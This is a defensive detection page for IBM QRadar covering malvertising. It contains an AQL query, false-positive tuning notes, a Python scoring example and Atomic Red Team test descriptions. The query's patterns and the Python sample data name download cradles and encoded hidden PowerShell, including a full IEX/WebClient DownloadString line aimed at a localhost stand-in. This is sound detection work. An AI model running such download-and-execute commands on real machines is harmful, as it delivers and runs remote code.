Detect Malvertising in IBM QRadar
Adversaries may purchase online advertisements to distribute malware to victims. Ads can be positioned prominently in search results or on popular websites, exploiting user trust in those platforms. Malvertising campaigns frequently spoof legitimate software vendors, tricking users into downloading trojanized installer packages. Because the adversary's infrastructure purchase occurs entirely outside the victim environment, detection must pivot to observable victim-side indicators: browsers spawning unexpected child processes, executable file downloads staged in user-writable directories, and drive-by script execution patterns consistent with clicking a malicious ad.
MITRE ATT&CK
- Tactic: Resource Development
- Technique: T1583 Acquire Infrastructure
- Sub-technique: T1583.008 Malvertising
- Canonical reference: https://attack.mitre.org/techniques/T1583/008/
QRadar Detection Query
SELECT
DATEFORMAT(devicetime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
logsourcename(logsourceid) AS log_source,
"username",
"sourceip",
QIDNAME(qid) AS event_name,
"Process Name" AS child_process,
"Command" AS command_line,
"Parent Process Name" AS parent_process,
CASE
WHEN ("Command" ILIKE '%\\Downloads\\%' OR "Command" ILIKE '%\\Temp\\%' OR "Command" ILIKE '%AppData\\Local\\Temp%') THEN 1 ELSE 0
END +
CASE
WHEN ("Command" ILIKE '%http://%' OR "Command" ILIKE '%https://%' OR "Command" ILIKE '%ftp://%') THEN 1 ELSE 0
END +
CASE
WHEN (LOWER("Command") ILIKE '%-enc%' OR LOWER("Command") ILIKE '%-encodedcommand%' OR
LOWER("Command") ILIKE '%downloadstring%' OR LOWER("Command") ILIKE '%downloadfile%' OR
LOWER("Command") ILIKE '%webclient%' OR LOWER("Command") ILIKE '%invoke-webrequest%' OR
LOWER("Command") ILIKE '%iex(%') THEN 1 ELSE 0
END +
CASE
WHEN (LOWER("Command") ILIKE '%-windowstyle hidden%' OR LOWER("Command") ILIKE '%-w hidden%' OR
LOWER("Command") ILIKE '%/quiet%' OR LOWER("Command") ILIKE '%/silent%' OR
LOWER("Command") ILIKE '%/verysilent%') THEN 1 ELSE 0
END + 1 AS suspicion_score
FROM events
WHERE
LOGSOURCETYPEID IN (12, 119, 382)
AND ("Event ID" = '1' OR "Event ID" = '4688')
AND (
LOWER("Parent Process Name") ILIKE '%chrome.exe' OR
LOWER("Parent Process Name") ILIKE '%msedge.exe' OR
LOWER("Parent Process Name") ILIKE '%firefox.exe' OR
LOWER("Parent Process Name") ILIKE '%iexplore.exe' OR
LOWER("Parent Process Name") ILIKE '%opera.exe' OR
LOWER("Parent Process Name") ILIKE '%brave.exe'
)
AND (
LOWER("Process Name") ILIKE '%powershell.exe' OR
LOWER("Process Name") ILIKE '%pwsh.exe' OR
LOWER("Process Name") ILIKE '%cmd.exe' OR
LOWER("Process Name") ILIKE '%mshta.exe' OR
LOWER("Process Name") ILIKE '%wscript.exe' OR
LOWER("Process Name") ILIKE '%cscript.exe' OR
LOWER("Process Name") ILIKE '%rundll32.exe' OR
LOWER("Process Name") ILIKE '%regsvr32.exe' OR
LOWER("Process Name") ILIKE '%msiexec.exe' OR
LOWER("Process Name") ILIKE '%certutil.exe' OR
LOWER("Process Name") ILIKE '%bitsadmin.exe'
)
AND devicetime > NOW() - 86400000
ORDER BY suspicion_score DESC, devicetime DESC

AQL query for IBM QRadar that correlates Windows Sysmon Event ID 1 (Process Create) and Security Event ID 4688 (New Process) to identify browsers spawning LOLBin or interpreter child processes. A multi-factor suspicion score is computed inline with CASE expressions that match download paths, network URLs, encoded-command tokens and silent-install flags, mirroring the reference SPL scoring logic; each matching factor adds 1 to a baseline of 1, so scores range from 1 (browser-to-LOLBin chain only) to 5 (all four factors present). The time window is applied directly on devicetime rather than through the LAST() aggregate, which is not valid in a WHERE clause without grouping. Results are ordered by suspicion score descending for analyst triage.
False Positives & Tuning
- Corporate patch management solutions that trigger browser-based authentication portals and subsequently call msiexec.exe or cmd.exe to apply updates silently (/quiet).
- Internal web applications that launch helper executables via browser protocol handlers (e.g., custom URI schemes), producing a browser→child-process chain with no malicious intent.
- Security awareness training platforms that simulate phishing/malvertising behavior in a controlled sandbox, generating real process-create events with matching parent-child patterns.
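To make the scoring and the tuning concrete, the following Python is an added example; it is not part of this page and not QRadar code. It re-implements the query's browser-parent and LOLBin-child filters and the four CASE factors over constructed Sysmon-style process-create records (sample data, not real telemetry), then applies a hypothetical tuning allowlist for the patch-management false positive listed above; the share path `\\patchmgmt01\deploy\` and the record field names are assumptions.

```python
"""Added example: offline re-implementation of the page's AQL suspicion score
plus a tuning allowlist. Not the page's own code; field names are assumed."""

from typing import Optional

# Parent and child image names from the query's WHERE clause (matched on basename).
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe",
            "opera.exe", "brave.exe")
SUSPICIOUS_CHILDREN = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                       "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
                       "msiexec.exe", "certutil.exe", "bitsadmin.exe")

# One entry per CASE expression in the query; each is a case-insensitive substring test.
FACTORS = {
    "download_path": ("\\downloads\\", "\\temp\\", "appdata\\local\\temp"),
    "network_url": ("http://", "https://", "ftp://"),
    "encoded_or_cradle": ("-enc", "-encodedcommand", "downloadstring", "downloadfile",
                          "webclient", "invoke-webrequest", "iex("),
    "silent_flags": ("-windowstyle hidden", "-w hidden", "/quiet", "/silent", "/verysilent"),
}

# Hypothetical tuning allowlist (assumption, not from the page): suppress a child image
# when its command line references a known patch-management share.
ALLOWLIST = (
    ("msiexec.exe", "\\\\patchmgmt01\\deploy\\"),
)

# Constructed sample records (not real telemetry). Fields mirror the QRadar
# properties the query reads: Parent Process Name, Process Name, Command.
SAMPLE_EVENTS = [
    {"event_id": "1", "user": "jdoe",                       # Test 1 pattern
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command": "powershell.exe -w hidden -enc <BASE64_PLACEHOLDER>"},
    {"event_id": "1", "user": "jdoe",                       # Test 3 pattern
     "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command": r"mshta.exe C:\Users\jdoe\AppData\Local\Temp\redirect.hta"},
    {"event_id": "4688", "user": "jdoe",                    # Test 4 pattern
     "parent": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command": "powershell.exe -NoP -W Hidden -c \"IEX((New-Object Net.WebClient)"
                ".DownloadString('http://127.0.0.1:18080/p.ps1'))\""},
    {"event_id": "1", "user": "svc-patch",                  # patch-management false positive
     "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command": r"msiexec.exe /i \\patchmgmt01\deploy\agent.msi /quiet"},
    {"event_id": "1", "user": "jdoe",                       # Test 2: installer from Downloads
     "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Users\jdoe\Downloads\7zip-2400-x64.exe",
     "command": r"C:\Users\jdoe\Downloads\7zip-2400-x64.exe /S"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_factors(command: str) -> dict:
    """Return 0/1 per factor, exactly as the query's CASE expressions would."""
    cmd = command.lower()
    return {name: int(any(tok in cmd for tok in toks)) for name, toks in FACTORS.items()}


def evaluate(event: dict) -> Optional[dict]:
    """Score one process-create record; None when the query's filters would not select it."""
    if event.get("event_id") not in ("1", "4688"):
        return None
    parent, child = _basename(event["parent"]), _basename(event["image"])
    if parent not in BROWSERS or child not in SUSPICIOUS_CHILDREN:
        return None
    factors = score_factors(event["command"])
    cmd = event["command"].lower()
    return {
        "parent": parent, "child": child, "factors": factors,
        "suspicion_score": sum(factors.values()) + 1,   # baseline 1, max 5
        "suppressed": any(child == c and s.lower() in cmd for c, s in ALLOWLIST),
    }


def triage(events) -> list:
    """Unsuppressed alerts ordered like the query: highest suspicion score first."""
    alerts = [a for a in (evaluate(e) for e in events) if a and not a["suppressed"]]
    return sorted(alerts, key=lambda a: a["suspicion_score"], reverse=True)


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["suspicion_score"], alert["parent"], "->", alert["child"], alert["factors"])
```

Running it ranks the download cradle (URL, cradle token and hidden window: score 4) above the encoded hidden PowerShell (score 3) and the HTA launched from Temp (score 2, with only DownloadPath set, as Test 3 expects), while the msiexec /quiet install from the patch-management share scores 2 but is suppressed. The last record shows a caveat worth keeping in mind when reading Test 2: an installer executed directly from the Downloads folder is not in the query's child-process list, so this rule never fires on it; that case is covered by the Sysmon Event ID 11 file-create and image-path-in-Downloads signals named in the test rather than by this query.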
Testing Methodology
Validate this detection against 4 Atomic Red Team tests. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Simulate Browser Spawning PowerShell (Malvertising Drive-by Pattern)
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, ParentImage=cmd.exe, CommandLine containing '-WindowStyle Hidden'. Sysmon Event ID 11: File Create for malv-test.txt in Temp. Security Event ID 4688 (if command line auditing enabled). PowerShell ScriptBlock Log Event ID 4104 showing Write-Output command.
- Test 2: Stage and Execute Trojanized Installer from Downloads Folder
Expected signal: Sysmon Event ID 11: File Create for 7zip-2400-x64.exe in the Downloads folder. Sysmon Event ID 1: Process Create with Image path inside the Downloads folder — anomalous for any legitimate software. Security Event ID 4688 if command line auditing is enabled.
- Test 3: HTA Drive-by Execution Simulating Malvertising Redirect
Expected signal: Sysmon Event ID 1: Process Create for mshta.exe with TargetFilename in Temp path. Sysmon Event ID 11: File Create for hta-atomic.txt. Security Event ID 4688 for mshta.exe execution. If launched from a browser parent, the main detection fires on mshta.exe as a SuspiciousChild with DownloadPath=1.
- Test 4: PowerShell Download Cradle Spawned from Browser Context (Simulated Raspberry Robin Pattern)
Expected signal: Sysmon Event ID 1: Process Create for powershell.exe, ParentImage=cmd.exe, CommandLine containing 'Net.WebClient' and 'DownloadString'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:18080 (connection refused, but event still fires). PowerShell ScriptBlock Log Event ID 4104 showing the download cradle code.
References (7)
- https://attack.mitre.org/techniques/T1583/008/
- https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/
- https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
- https://www.ic3.gov/Media/Y2022/PSA221221
- https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/
- https://www.bbc.com/news/technology-12891182
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1583.008/T1583.008.md